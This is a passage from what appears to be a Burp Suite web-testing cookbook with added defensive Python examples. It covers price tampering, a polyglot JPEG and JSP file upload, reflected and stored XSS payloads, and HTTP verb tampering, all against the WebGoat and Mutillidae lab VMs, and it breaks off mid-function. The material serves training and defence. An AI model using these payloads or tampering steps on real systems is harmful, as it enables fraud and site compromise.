[Screenshot: the HTTP history Filter panel (Filter by request type, Filter by MIME type, Filter by status code, and so on), with Script checked under Filter by MIME type]


6. Return to the Firefox browser with WebGoat and specify a quantity of 2 for 
the Hewlett-Packard - Pavilion Notebook with Intel Centrino item: 


[Screenshot: the cart with quantity 2 for the Hewlett-Packard - Pavilion Notebook with Intel Centrino ($1599.99, line total $3,199.98); Total before coupon is applied: $3,199.98; Total to be charged to your credit card: $3,199.98; credit card number 4128 3214 0002 1999; empty coupon code field; Purchase button]


7. Switch back to Burp's Proxy | HTTP history tab and notice the JavaScript 
(*.js) files associated with the change you made to the quantity. Note a 
script called clientSideValidation.js. Make sure the status code is 200 
and not 304 (not modified). Only the 200 status code will show you the 
source code of the script: 


[Screenshot: HTTP history rows for http://192.168.56.101, including GET /WebGoat/attack?Screen=119&menu=400 and several GET /WebGoat/javascript/*.js requests, some with status 200 and some with 304]


8. Select the clientSideValidation.js file and view its source code in the 
Response tab. 


9. Note that coupon codes are hard-coded within the JavaScript file. However, 
used literally as they are, they will not work: 


[Screenshot: the Response tab for clientSideValidation.js]

   HTTP/1.1 200 OK
   Date: Sun, 09 Sep 2018 17:28:02 GMT
   Server: Apache-Coyote/1.1
   Pragma: No-cache
   Cache-Control: no-cache
   Expires: Wed, 31 Dec 1969 19:00:00 EST
   Accept-Ranges: bytes
   ETag: W/"2946-1438572894000"
   Last-Modified: Mon, 03 Aug 2015 03:34:54 GMT
   Content-Type: text/javascript
   Via: 1.1 127.0.1.1
   Vary: Accept-Encoding
   Content-Length: 2946
   Connection: close

   var coupons = ["nvojubmq",
                  "emph",
                  "sfmmjt",
                  "pxuttfsq"];

   function isValidCoupon(coupon) {
       coupon = coupon.toUpperCase();
       for (var i = 0; i < coupons.length; i++) {
           decrypted = decrypt(coupons[i]);
           if (coupon == decrypted) {
               ajaxFunction(coupon);
               return true;
           }
       }
       return false;
   }


10. Keep looking at the source code and notice there is a decrypt function 
found in the JavaScript file. We can test one of the coupon codes by sending 
it through this function. Let's try this test back in the Firefox browser. 

11. In the browser, bring up the developer tools (F12) and go to the Console 
tab. Paste into the console (look for the >> prompt) the following command: 


decrypt('emph'); 


12. You may use this command to call the decrypt function on any of the 
coupon codes declared within the array: 
[Screenshot: the WebGoat lesson page with the Firefox developer tools Console open beneath it and decrypt('emph'); typed at the prompt]


13. After pressing Enter, you will see the coupon code is decrypted to the word 
GOLD: 


[Screenshot: the Console output]

   >> decrypt('emph');
   "GOLD"


14. Place the word GOLD within the Enter your coupon code box. Notice the 
amount is now much less. Next, click the Purchase button: 


[Screenshot: the cart with the coupon code GOLD entered. Hewlett-Packard - Pavilion Notebook with Intel Centrino at quantity 2, $3,199.98; Total before coupon is applied: $3,199.98; Total to be charged to your credit card: $1,599.99; credit card number 4128 3214 0002 1999; Enter your coupon code: GOLD]


15. We receive confirmation regarding stage 1 completion. Let's now try to get 
the purchase for free: 


[Screenshot: the lesson now reads "STAGE 2: Now, try to get your entire order for free." with "Stage 1 completed." beneath it]


16. Switch to Burp's Proxy | Intercept tab and turn Interceptor on with the 
button Intercept is on. 

17. Return to Firefox and press the Purchase button. While the request is 
paused, modify the $1,599.99 amount to $0.00. Look for the GRANDTOT 
parameter to help you find the grand total to change: 


[Screenshot: the paused request in Proxy | Intercept: POST /WebGoat/attack?Screen=119&menu=400 HTTP/1.1 to Host 192.168.56.101 with Content-Type: application/x-www-form-urlencoded, the JSESSIONID, acopendivids and acgroupswithpersist cookies and a Basic Authorization header. The URL-encoded body carries, per cart row, a PRCn price, QTYn quantity and TOTn line total (QTY3=2, TOT3=$3,199.98), then SUBTOT=$3,199.98, GRANDTOT, field2=4128 3214 0002 1999, field1=GOLD and SUBMIT=Purchase; GRANDTOT is the value to change to $0.00]


18. Click the Forward button. Now turn Interceptor off by clicking the toggle 
button to Intercept is off. 

19. You should receive a success message. Note the total charged is now $0.00: 


[Screenshot: the STAGE 2 page reading "Congratulations. You have successfully completed this lesson.", with the cart, the credit card number 4128 3214 0002 1999 and the coupon code GOLD still in place]


How it works... 


Due to a lack of server-side checking for both the coupon code as well as the 
grand total amount prior to charging the credit card, we are able to circumvent 
the prices assigned and set our own prices instead. 
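The server-side check this recipe shows to be missing, written here as an added Python example (not WebGoat's code): the handler parses a body shaped like the intercepted Purchase request, ignores every client-supplied price and total, recomputes the charge from its own catalogue and its own coupon table, and rejects the order when the client's GRANDTOT disagrees. The catalogue prices are the lesson's; GOLD halving the total is an assumption that matches the $3,199.98 to $1,599.99 change observed in step 14.

```python
from decimal import Decimal
from typing import Dict, Tuple
from urllib.parse import parse_qs

# Server-side catalogue, in the order of the lesson's four cart rows (PRC1..PRC4).
CATALOG = {
    1: ("Studio RTA - Laptop/Reading Cart", Decimal("69.99")),
    2: ("Dynex - Traditional Notebook Case", Decimal("27.99")),
    3: ("Hewlett-Packard - Pavilion Notebook", Decimal("1599.99")),
    4: ("3 - Year Performance Service Plan", Decimal("299.99")),
}
# Server-side coupon table (assumed: GOLD = 50% off, which reproduces the lesson's totals).
COUPONS = {"GOLD": Decimal("0.50")}


def money(text: str) -> Decimal:
    """Turn a client-formatted amount such as '$3,199.98' into a Decimal."""
    return Decimal(text.replace("$", "").replace(",", "").strip() or "0")


def server_total(form: Dict[str, str]) -> Decimal:
    """Recompute the charge from trusted prices, client quantities and a validated coupon."""
    subtotal = Decimal("0")
    for row, (_, unit_price) in CATALOG.items():
        qty = int(form.get(f"QTY{row}", "0"))
        if qty < 0:
            raise ValueError(f"negative quantity for row {row}")
        subtotal += unit_price * qty            # PRCn and TOTn from the client are ignored
    discount = COUPONS.get(form.get("field1", "").upper(), Decimal("0"))
    return (subtotal * (1 - discount)).quantize(Decimal("0.01"))


def process_purchase(body: str) -> Tuple[bool, str]:
    """Accept the order only when the client's GRANDTOT equals the server's own figure."""
    form = {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}
    expected = server_total(form)
    claimed = money(form.get("GRANDTOT", ""))
    if claimed != expected:
        return False, f"rejected: client total {claimed} != server total {expected}"
    return True, f"charged {expected}"


# Constructed body modelled on the intercepted request in step 17 ($ is sent as %24).
LEGIT = ("PRC1=%2469.99&QTY1=0&TOT1=%240.00&PRC2=%2427.99&QTY2=0&TOT2=%240.00"
         "&PRC3=%241599.99&QTY3=2&TOT3=%243%2C199.98&PRC4=%24299.99&QTY4=0&TOT4=%240.00"
         "&SUBTOT=%243%2C199.98&GRANDTOT=%241%2C599.99&field2=4128+3214+0002+1999"
         "&field1=GOLD&SUBMIT=Purchase")
TAMPERED = LEGIT.replace("GRANDTOT=%241%2C599.99", "GRANDTOT=%240.00")   # step 17's edit

if __name__ == "__main__":
    print(process_purchase(LEGIT))
    print(process_purchase(TAMPERED))
```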


Uploading malicious files — polyglots 


Polyglot is a term defined as something that uses several languages. If we carry 
this concept into hacking, it means the creation of a cross-site scripting (XSS) 
attack vector by using different languages as execution points. For example, 
attackers can construct valid images and embed JavaScript with them. The 
placement of the JavaScript payload is usually in the comments section of an 
image. Once the image is loaded in a browser, the XSS content may execute, 
depending upon the strictness of the content-type declared by the web server and 
the interpretation of the content-type by the browser. 
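As an added defensive example (not from the PortSwigger post or WebGoat), the Python below walks a JPEG's segment table and flags script-like strings inside any metadata segment, the comment (COM) segment being the hiding place described above; it also scans bytes appended after the End Of Image marker, a generalisation beyond the comment case. The sample images are constructed skeletons with a harmless marker string, not real pictures and not the xss.jpg from the blog.

```python
import re
import struct
from typing import Iterator, List, Tuple

# Strings that have no business inside image metadata.
SCRIPT_PATTERN = re.compile(rb"<script|javascript:", re.IGNORECASE)
STANDALONE_MARKERS = {0xD8, 0xD9, 0x01} | set(range(0xD0, 0xD8))   # SOI, EOI, TEM, RSTn
SEGMENT_NAMES = {0xE0: "APP0", 0xE1: "APP1", 0xFE: "COM", 0xDA: "SOS"}


def jpeg_segments(data: bytes) -> Iterator[Tuple[int, int, bytes]]:
    """Yield (marker, offset, payload) for each segment up to and including SOS."""
    if not data.startswith(b"\xff\xd8"):
        raise ValueError("not a JPEG: missing SOI marker")
    pos = 2
    while pos + 2 <= len(data):
        if data[pos] != 0xFF:
            raise ValueError(f"expected a marker at offset {pos}")
        marker = data[pos + 1]
        if marker == 0xFF:                  # fill byte before a marker
            pos += 1
            continue
        if marker in STANDALONE_MARKERS:
            yield marker, pos, b""
            pos += 2
            if marker == 0xD9:              # EOI: nothing structured follows
                return
            continue
        if pos + 4 > len(data):
            raise ValueError("truncated segment header")
        (length,) = struct.unpack(">H", data[pos + 2:pos + 4])
        if length < 2 or pos + 2 + length > len(data):
            raise ValueError(f"bad segment length at offset {pos}")
        yield marker, pos, data[pos + 4:pos + 2 + length]
        if marker == 0xDA:                  # entropy-coded scan data follows: stop here
            return
        pos += 2 + length


def find_script_in_jpeg(data: bytes) -> List[Tuple[str, int]]:
    """Report (segment, absolute offset) for script-like strings in metadata or after EOI."""
    findings = []
    for marker, offset, payload in jpeg_segments(data):
        name = SEGMENT_NAMES.get(marker, f"0xFF{marker:02X}")
        for m in SCRIPT_PATTERN.finditer(payload):
            findings.append((name, offset + 4 + m.start()))   # skip marker + length bytes
    eoi = data.rfind(b"\xff\xd9")
    if eoi != -1:                           # bytes appended past End Of Image
        for m in SCRIPT_PATTERN.finditer(data, eoi + 2):
            findings.append(("after-EOI", m.start()))
    return findings


def make_jpeg(comment: bytes = b"", trailer: bytes = b"") -> bytes:
    """Constructed JPEG skeleton (not a decodable picture): SOI, APP0, optional COM, SOS, EOI."""
    app0 = b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
    out = [b"\xff\xd8", b"\xff\xe0", struct.pack(">H", len(app0) + 2), app0]
    if comment:
        out += [b"\xff\xfe", struct.pack(">H", len(comment) + 2), comment]
    out += [b"\xff\xda", struct.pack(">H", 2), b"\x12\x34\x56", b"\xff\xd9", trailer]
    return b"".join(out)


if __name__ == "__main__":
    marker_text = b"<script>/* constructed marker */</script>"
    print("clean:  ", find_script_in_jpeg(make_jpeg()))
    print("COM:    ", find_script_in_jpeg(make_jpeg(comment=marker_text)))
    print("trailer:", find_script_in_jpeg(make_jpeg(trailer=marker_text)))
```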


Getting ready 


• Download a JPG file containing a cross-site scripting vulnerability from the 
PortSwigger blog page: https://portswigger.net/blog/bypassing-csp-using-polyglot-jpegs 
   ◦ Here is a direct link to the polyglot image: http://portswigger-labs.net/polyglot/jpeg/xss.jpg 
• Using the OWASP WebGoat file upload functionality, we will plant an 
image into the application that contains an XSS payload. 


How to do it... 


1. Ensure the owaspbwa VM is running. Select the OWASP WebGoat 
application from the initial landing page of the VM. The landing page will 
be configured to an IP address specific to your machine. 

2. After you click the OWASP WebGoat link, you will be prompted for login 
credentials. Use these credentials: username: guest; password: guest. 

3. After authentication, click the Start WebGoat button to access the 
application exercises. 


4. Click Malicious Execution | Malicious File Execution from the left-hand 
menu. You are presented with a file upload functionality page. The 
instructions state that only images are allowed for upload: 


[Screenshot: the Malicious File Execution lesson. It reads "The form below allows you to upload an image which will be displayed on this page. Features like this are often found on web based discussion boards and social networking sites. This feature is vulnerable to Malicious File Execution. In order to pass this lesson, upload and run a malicious file. In order to prove that your file can execute, it should create another file named: /var/lib/tomcat6/webapps/WebGoat/mfe_target/guest.txt. Once you have created this file, you will pass the lesson." Under WebGoat Image Storage: Your current image: No image uploaded; Upload a new image: Browse... and Start Upload]


5. Browse to the location where you saved the xss.jpg image that you 
downloaded from the PortSwigger blog page mentioned at the beginning of 
this recipe. 

6. The following screenshot shows how the image looks. As you can see, it is 
difficult to detect any XSS vulnerability contained within the image. It is 
hidden from plain view. 


7. Click the Browse button to select the xss.jpg file: 


[Screenshot: the Malicious File Execution lesson's upload form with xss.jpg selected next to the Browse... button, before clicking Start Upload; "No image uploaded" is still shown under Your current image]


8. Switch to Burp's Proxy | Options. Make sure you are capturing server 
responses (the Intercept Server Responses section) and have the following 
settings enabled. This will allow us to capture HTTP responses that were 
modified or intercepted: 


[Screenshot: Proxy | Options, Intercept Server Responses. "Intercept responses 
based on the following rules" is enabled, with the rules: Content type header 
Matches text; Request Was modified; Status code Does not match ^304$; URL Is in 
target scope. "Automatically update Content-Length header when the response is 
edited" is checked.] 


9. Switch to Burp's Proxy | Intercept tab. Turn Interceptor on with the button 
Intercept is on. 
10. Return to the Firefox browser, and click the Start Upload button. The 
message should be paused within Burp's Interceptor. 


[Screenshot: Proxy | Intercept with the upload request paused. The request, 
with the OCR noise and the binary image data removed:] 

POST /WebGoat/attack?Screen=18&menu=1600 HTTP/1.1 
Host: 192.168.56.101 
Content-Type: multipart/form-data; boundary=---------------------------41184676334 
Connection: close 

-----------------------------41184676334 
Content-Disposition: form-data; name="myfile"; filename="xss.jpg" 
Content-Type: image/jpeg 

[binary JPEG data] 


11. Within the Intercept window while the request is paused, type Burp rocks 
into the search box at the bottom. You should see a match in the middle of 
the image. This is our polyglot payload. It is an image, but it contains a 
hidden XSS script within the comments of the image: 


[Screenshot: the paused request in Proxy | Intercept with "Burp rocks" typed in 
the search box; the match is highlighted in the middle of the image data.] 
12. Click the Forward button. Now turn Interceptor off by clicking the toggle 
button to Intercept is off. 

13. Using Notepad or your favorite text editor, create a new file called 
poly.jsp, and write the following code within the file: 


<HTML> 
<% java.io.File file = new 
java.io.File("/var/lib/tomcat6/webapps/WebGoat/mfe_target/guest.txt"); 
file.createNewFile();%> 
</HTML> 


14. Return to the Malicious File Execution page, browse to the poly.jsp 
file you created, and then click the Start Upload button. The poly.jsp is a 
Java Server Pages file that is executable on this web server. Following the 
instructions, we must create a guest.txt file in the path provided. This 
code creates that file in JSP scriptlet tag code: 


[Screenshot: the WebGoat Malicious File Execution lesson page after poly.jsp 
has been uploaded.] 


15. Right-click the unrecognized image, and select Copy Image Location. 

16. Open a new tab within the same Firefox browser as WebGoat, and paste the 
image location in the new tab. Press Enter to execute the script, and give 
the script a few seconds to run in the background before moving to the next 
step. 


17. Flip back to the first tab and press F5 to refresh the page; you should 
receive the successfully completed message. If your script is running slowly, 
try uploading poly.jsp on the upload page again. The success message 
should appear: 
[Screenshot: the WebGoat Malicious File Execution lesson page showing the 
success message: "Congratulations. You have successfully completed this 
lesson."] 


How it works... 


Due to an unrestricted file upload vulnerability, we can upload a malicious 
file, such as a polyglot, without detection by the web server. Many sites allow 
images to be uploaded, so developers must ensure such images do not carry XSS 
payloads within them. Protection in this area can be in the form of magic 
number checks or special proxy servers screening all uploads. 
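
The magic-number check mentioned above, as an added example that is not code 
from the book or from WebGoat: a server-side upload check combining an 
extension allowlist, a magic-number sniff and a test that the two agree. The 
function names are hypothetical and the sample files are constructed inline; 
the check deliberately models only what the paragraph describes. 

```python
"""Added example, not code from the book or from WebGoat: a server-side upload
check of the kind the "How it works" section recommends, combining an extension
allowlist with a magic-number check and a test that the two agree. Function
names are hypothetical and the sample files are constructed inline."""
import os

# Leading bytes of the image types this hypothetical handler accepts.
IMAGE_SIGNATURES = {
    "jpg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
}
EXTENSION_ALIASES = {"jpeg": "jpg"}

# Constructed samples: a minimal JPEG header; a JPEG header followed by a COM
# (comment) segment carrying text, the way a polyglot does; and a JSP source file.
SAMPLE_JPEG = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00" + b"\x00" * 16
SAMPLE_POLYGLOT = b"\xff\xd8\xff\xfe\x00\x10/*Burp rocks*/" + b"\x00" * 16
SAMPLE_JSP = b"<HTML><% /* scriptlet */ %></HTML>"


def sniff_image_type(data):
    """Return the image type implied by the file's magic number, or None."""
    for image_type, signatures in IMAGE_SIGNATURES.items():
        if any(data.startswith(sig) for sig in signatures):
            return image_type
    return None


def check_upload(filename, data):
    """Decide whether an upload may be stored. Returns (accepted, reason).

    Order matters: the extension is checked first so that an executable
    extension such as .jsp is refused before the content is even looked at;
    then the magic number must identify an image; then it must match the
    extension so that a renamed file cannot claim a type it does not have."""
    base = os.path.basename(filename)
    parts = base.split(".")
    if len(parts) != 2 or not parts[0]:          # refuses "poly.jsp.jpg" and ".jpg"
        return False, "filename must have exactly one extension"
    ext = EXTENSION_ALIASES.get(parts[1].lower(), parts[1].lower())
    if ext not in IMAGE_SIGNATURES:
        return False, f"extension .{ext} is not allowed"
    sniffed = sniff_image_type(data)
    if sniffed is None:
        return False, "content does not start with an image magic number"
    if sniffed != ext:
        return False, f"extension .{ext} does not match content type {sniffed}"
    return True, "ok"
```

The constructed polyglot sample passes this check, which is the caveat worth 
keeping in mind: a magic-number check establishes that a file starts like an 
image, not that it contains nothing else. In this recipe the server executes a 
.jsp placed in its webapps directory, so the extension allowlist and storing 
uploads outside any script-executing path are what close that hole; the 
JavaScript hidden in the JPEG comment is neutralized by serving uploads with 
the correct Content-Type and X-Content-Type-Options: nosniff, so a browser 
will not run an image as a script, and re-encoding images on upload drops the 
comment segments altogether. 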


There's more... 


To read more about polyglots, please refer to the PortSwigger 
blog: https://portswigger.net/blog/bypassing-csp-using-polyglot-jpegs. 


Evaluating Input Validation Checks 


In this chapter, we will cover the following recipes: 


• Testing for reflected cross-site scripting 
• Testing for stored cross-site scripting 
• Testing for HTTP verb tampering 
• Testing for HTTP Parameter Pollution 
• Testing for SQL injection 
• Testing for command injection 


Introduction 


Failure to validate any input received from the client before using it in the 
application code is one of the most common security vulnerabilities found in 
web applications. This flaw is the source for major security issues, such as SQL 
injection and cross-site scripting (XSS). Web-penetration testers must evaluate 
and determine whether any input is reflected back or executed upon by the 
application. We'll learn how to use Burp to perform such tests. 


Software tool requirements 


In order to complete the recipes in this chapter, you will need the following: 


• OWASP Broken Web Applications (VM) 
• OWASP Mutillidae link 
• Burp Proxy Community or Professional (https://portswigger.net/burp/) 


Testing for reflected cross-site scripting 


Reflected cross-site scripting occurs when malicious JavaScript is injected into 
an input field, parameter, or header and, after returning from the web server, is 
executed within the browser. Reflected XSS occurs when the execution of the 
JavaScript reflects in the browser only and is not a permanent part of the web 
page. Penetration testers need to test all client values sent to the web server to 
determine whether XSS is possible. 


Getting ready 


Using OWASP Mutillidae II, let's determine whether the application protects 
against reflected cross-site scripting (XSS). 


How to do it... 


1. From the OWASP Mutillidae II menu, select Login by navigating to OWASP 
2013 | A3 - Cross Site Scripting (XSS) | Reflected (First Order) | Pen Test 
Tool Lookup: 


[Screenshot: the OWASP Mutillidae II menu (Version 2.6.24, Security Level 0 
(Hosed), Hints Enabled), navigating OWASP 2013 | A3 - Cross Site Scripting 
(XSS) | Reflected (First Order) | Pen Test Tool Lookup.] 


2. Select a tool from the drop-down listing and click the Lookup Tool button. 
Any value from the drop-down list will work for this recipe: 


[Screenshot: the Pen Test Tool Lookup page, with Skipfish selected in the 
Pen Test Tool drop-down and the Lookup Tool button below it.] 


3. Switch to Burp Proxy | HTTP history and find the HTTP message you just 
created by selecting the lookup tool. Note that in the request is a parameter 
called ToolID. In the following example, the value is 16: 


[Screenshot: the lookup request in Proxy | HTTP history. The request, with 
the OCR noise removed and only the relevant lines kept:] 

POST /mutillidae/index.php?page=pen-test-tool-lookup.php HTTP/1.1 
Host: 192.168.56.101 
Content-Type: application/x-www-form-urlencoded 
Content-Length: 60 

ToolID=16&pen-test-tool-lookup-php-submit-button=Lookup+Tool 


4. Flip over to the Response tab and note the JSON returned from the request. 
You can find the JavaScript function in the response more easily by typing 
PenTest in the search box at the bottom. Note that the tool_id is reflected 
in a response parameter called toolIDRequested. This may be an attack 
vector for XSS: 


[Screenshot: the corresponding response in Proxy | HTTP history, located with 
the search box. The lines of interest, with OCR noise removed:] 

var gUseSafeJSONParser = "FALSE"; 
var gUseJavaScriptValidation = "FALSE"; 
var gDisplayError = "FALSE"; 
var gPenTestToolsJSONString = '{"query": {"toolIDRequested": "16", "penTestTools": [{"tool_id":"16","tool_name":"Dig","phase_to_use":"Reconnaissance","tool_type":"DNS Server Query Tool","comment":"The Domain Information Groper is prefered on Linux over NSLookup and provides more information natively. NSLookup must be in debug mode to give similar output. DIG can perform zone transfers if the DNS server allows transfers."}]}}' 

var addRow = function(pRowOfData){ 
    try{ 
        var lDocRoot = window.document; 
        var lTBody = lDocRoot.getElementById("idDisplayTableBody"); 
        var lTR = lDocRoot.createElement("tr"); 
        //tool_id, tool_name, phase_to_use, tool_type, comment 
        ... 
5. Send the request over to Repeater. Add an XSS payload within the ToolID 
parameter immediately following the number. Use a simple payload such 
as <script>alert(1);</script>: 


[Screenshot: the request in Repeater with the payload added. The relevant 
lines, OCR noise removed:] 

POST /mutillidae/index.php?page=pen-test-tool-lookup.php HTTP/1.1 
Host: 192.168.56.101 
Content-Type: application/x-www-form-urlencoded 

ToolID=16<script>alert(1);</script>&pen-test-tool-lookup-php-submit-button=Lookup+Tool 


6. Click Go and examine the returned JSON response, searching for PenTest. 
Notice our payload is returned exactly as inputted. It looks like the 
developer is not sanitizing any of the input data before using it. Let's exploit 
the flaw: 


[Screenshot: the Repeater response (Raw view). The value of toolIDRequested in 
gPenTestToolsJSONString contains the <script>alert(1);</script> payload 
exactly as it was sent; the rest of the JSON and the addRow function are 
unchanged.] 


7. Since we are working with JSON instead of HTML, we will need to adjust 
the payload to match the structure of the JSON returned. We will fool the 
JSON into thinking the payload is legitimate. We will modify the original 
<script>alert(1);</script> payload to "}} )%3balert(1)%3b// 
instead. 

8. Switch to the Burp Proxy | Intercept tab. Turn Interceptor on with the button 
Intercept is on. 

9. Return to Firefox, select another tool from the drop-down list, and click the 
Lookup Tool button. 


10. While Proxy | Interceptor has the request paused, insert the new payload 
of "}} )%3balert(1)%3b// immediately after the Tool ID number: 


[Screenshot: Proxy | Intercept with the lookup request paused (POST 
/mutillidae/index.php?page=pen-test-tool-lookup.php HTTP/1.1, Host 
192.168.56.101); the new payload is inserted after the ToolID value in the 
request body.] 
11. Click the Forward button. Turn Interceptor off by toggling to Intercept is 
off. 

12. Return to the Firefox browser and see the pop-up alert box displayed. 
You've successfully shown a proof of concept (PoC) for the reflected XSS 
vulnerability: 


How it works... 


The flaw exists due to inadequate input cleansing prior to using data received 
from the client. In this case, the penetration testing tool identifier is 
reflected in the response exactly as it is received from the client, providing 
an attack vector for XSS. 


Testing for stored cross-site scripting 


Stored cross-site scripting occurs when malicious JavaScript is injected into an 
input field, parameter, or header and, after returning from the web server, is 
executed within the browser and becomes a permanent part of the page. Stored 
XSS occurs when the malicious JavaScript is stored in the database and is used 
later to populate the display of a web page. Penetration testers need to test all 
client values sent to the web server to determine whether XSS is possible. 


Getting ready 


Using OWASP Mutillidae II, let's determine whether the application protects 
against stored cross-site scripting. 


How to do it... 


1. From the OWASP Mutillidae II menu, select Login by navigating to OWASP 
2013 | A3 - Cross Site Scripting (XSS) | Persistent (First Order) | Add to 
your blog: 


[Screenshot: the OWASP Mutillidae II menu, navigating OWASP 2013 | A3 - Cross 
Site Scripting (XSS) | Persistent (Second Order) | Add to your blog.] 


2. Place some verbiage into the text area. Before clicking the Save Blog Entry 
button, let's try a payload with the entry: 


[Screenshot: Burp Proxy | HTTP history showing the earlier request for the 
Mutillidae home page, GET /mutillidae/index.php?page=home.php&popUpNotificationCode=HPH0.] 


3. Switch to the Burp Proxy | Intercept tab. Turn Interceptor on with the button 
Intercept is on. 

4. While Proxy | Interceptor has the request paused, insert the new payload of 
<script>alert(1);</script> immediately following the verbiage you 
added to the blog: 


[Screenshot: Proxy | Intercept with the blog entry request paused. The request, 
OCR noise removed:] 

POST /mutillidae/index.php?page=add-to-your-blog.php HTTP/1.1 
Host: 192.168.56.101 
Content-Type: application/x-www-form-urlencoded 
Content-Length: 95 

csrf-token=&blog_entry=This+is+my+blog+entry&add-to-your-blog-php-submit-button=Save+Blog+Entry 


5. Click the Forward button. Turn Interceptor off by toggling to Intercept is 
off. 
6. Return to the Firefox browser and see the pop-up alert box displayed: 


7. Click the OK button to close the pop-ups. Reload the page and you will see 
the alert pop-up again. This is because your malicious script has become a 
permanent part of the page. You've successfully shown a proof of concept 
(PoC) for the stored XSS vulnerability! 


How it works... 


Stored or persistent XSS occurs because the application not only neglects to 
sanitize the input but also stores the input within the database. Therefore, when a 
page is reloaded and populated with database data, the malicious script is 
executed along with that data. 
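
The two output contexts exercised by this recipe and by the reflected XSS 
recipe before it, as an added example (not code from the book or from 
Mutillidae): the lookup page places a client value inside a JSON document that 
the page's JavaScript later parses, and the blog page places a stored entry 
into HTML. Each is built the unsafe way first, then with proper serialization 
or context-specific output encoding. Python's json.loads stands in for a strict 
client-side JSON.parse; function names and sample inputs are constructed. 

```python
"""Added example, not code from the book or from Mutillidae. It models the two
output contexts the reflected and stored XSS recipes exercise: a client value
placed inside a JSON document that the page's JavaScript later parses, and a
stored blog entry placed into HTML. Each is shown the unsafe way (string
concatenation, no encoding) and the hardened way (proper serialization and
context-specific output encoding). Names and sample inputs are constructed."""
import html
import json
from urllib.parse import unquote

# The two payloads from the recipes, as the server sees them after URL decoding.
REFLECTED_PAYLOAD = "16" + unquote('"}} )%3balert(1)%3b//')  # aimed at the JSON/JS context
STORED_PAYLOAD = "This is my blog entry<script>alert(1);</script>"  # aimed at the HTML context


def build_lookup_json_unsafe(tool_id):
    """Concatenates the client value straight into the JSON text, as the
    vulnerable lookup page does. A quote in the value closes the string and
    the rest of the payload becomes part of the document."""
    return '{"query": {"toolIDRequested": "' + tool_id + '", "penTestTools": []}}'


def build_lookup_json_safe(tool_id):
    """Serializes with json.dumps so quotes and braces in the value are
    escaped and it can only ever be read back as data."""
    return json.dumps({"query": {"toolIDRequested": tool_id, "penTestTools": []}})


def parse_like_browser(json_text):
    """Stands in for a strict client-side JSON.parse: returns the parsed
    document, or None when the text is not a single valid JSON value. An
    eval-based parser (gUseSafeJSONParser = "FALSE") would instead execute
    whatever follows the closed structure."""
    try:
        return json.loads(json_text)
    except ValueError:
        return None


def render_blog_entry_unsafe(entry):
    """Stored XSS: the entry is written into the page markup verbatim."""
    return "<tr><td>" + entry + "</td></tr>"


def render_blog_entry_safe(entry):
    """HTML-context output encoding: <, >, & and quotes become entities, so
    the stored script is displayed as text rather than executed."""
    return "<tr><td>" + html.escape(entry, quote=True) + "</td></tr>"
```

With the concatenated document, a strict parser stops at the first complete 
JSON value and rejects the trailing `);alert(1);//` as extra data; it is the 
eval-based parser the page falls back to that turns that trailing text into 
executed code. The serialized form hands the identical payload back as a plain 
string value, and the escaped blog entry renders the script tag as literal 
text. 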


Testing for HTTP verb tampering 


HTTP requests can include methods beyond GET and POST. As a penetration 
tester, it is important to determine which other HTTP verbs (that is, methods) the 
web server allows. Support for other verbs may disclose sensitive information 
(for example, TRACE) or allow for a dangerous invocation of application code 
(for example, DELETE). Let's see how Burp can help test for HTTP verb 
tampering. 


Getting ready 


Using OWASP Mutillidae II, let's determine whether the application allows 
HTTP verbs beyond GET and POST. 


How to do it... 


1. Navigate to the homepage of OWASP Mutillidae II. 

2. Switch to Burp Proxy | HTTP history and look for the HTTP request you 
just created while browsing to the homepage of Mutillidae. Note the 
method used is GET. Right-click and send the request to Intruder: 

[Screenshot: Proxy | HTTP history with the home page request selected. The 
request, OCR noise removed:] 

GET /mutillidae/index.php?page=home.php&popUpNotificationCode=HPH0 HTTP/1.1 
Host: 192.168.56.101 
Connection: close 


3. In the Intruder | Positions tab, clear all suggested payload markers. 
Highlight the GET verb, and click the Add $ button to place payload markers 
around the verb: 


[Screenshot: Intruder | Positions, Attack type Sniper, with § payload markers 
placed around the GET verb at the start of the request line.] 
4. In the Intruder | Payloads tab, add the following values to the Payload 
Options [Simple list] text box: 
o OPTIONS 
o HEAD 
o POST 
o PUT 
o DELETE 
o TRACE 
o TRACK 
o CONNECT 
o PROPFIND 
o PROPPATCH 
o MKCOL 
o COPY 


[Screenshot: Intruder | Payloads, Payload Options [Simple list], with the 
verbs listed above entered; the list can be extended with the Add and 
Add from list ... controls.] 


5. Uncheck the Payload Encoding box at the bottom of the Payloads page and 
then click the Start attack button. 


6. When the attack results table appears, and the attack is complete, note all of 
the verbs returning a status code of 200. This is worrisome as most web 
servers should not be supporting so many verbs. In particular, the support 
for TRACE and TRACK would be included in the findings and final report 
as vulnerabilities: 


[Screenshot: the Intruder attack results table listing the twelve verb 
payloads (OPTIONS, HEAD, POST, PUT, DELETE, TRACE, TRACK, CONNECT, PROPFIND, 
PROPPATCH, MKCOL, COPY) with their status codes.] 


How it works... 


Testing for HTTP verb tampering includes sending requests against the 
application using different HTTP methods and analyzing the response received. 
Testers need to determine whether a status code of 200 is returned for any of the 
verbs tested, indicating the web server allows requests of this verb type. 
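
The control the finding above calls for, as an added example that is not the 
book's or Mutillidae's code: a method allowlist in front of the application, 
written as a WSGI middleware and exercised offline against a hypothetical app 
that, like the server in the recipe, answers every verb with 200. The app, the 
function names and the choice of 405 versus 501 are assumptions of this 
example; the probed verb list is the one from step 4. 

```python
"""Added example, not from the book: a method allowlist enforced in front of an
application, which is the server-side control the verb tampering recipe tests
for. It is written as a WSGI middleware wrapped around a tiny hypothetical app
and is exercised offline by calling it with constructed environ dictionaries."""
ALLOWED_METHODS = ("GET", "HEAD", "POST")
# Verbs the recipe lists as Intruder payloads; used here only as probe input.
PROBED_VERBS = ["OPTIONS", "HEAD", "POST", "PUT", "DELETE", "TRACE", "TRACK",
                "CONNECT", "PROPFIND", "PROPPATCH", "MKCOL", "COPY"]
# Verbs this server knows about but does not allow; anything else is unimplemented.
KNOWN_METHODS = {"GET", "HEAD", "POST", "PUT", "DELETE", "OPTIONS", "TRACE",
                 "CONNECT", "PATCH"}


def homepage_app(environ, start_response):
    """Hypothetical application: answers every method it is handed with 200,
    which is the behaviour the recipe's Intruder results expose."""
    start_response("200 OK", [("Content-Type", "text/html")])
    return [b"<html><body>home</body></html>"]


def method_allowlist(app, allowed=ALLOWED_METHODS):
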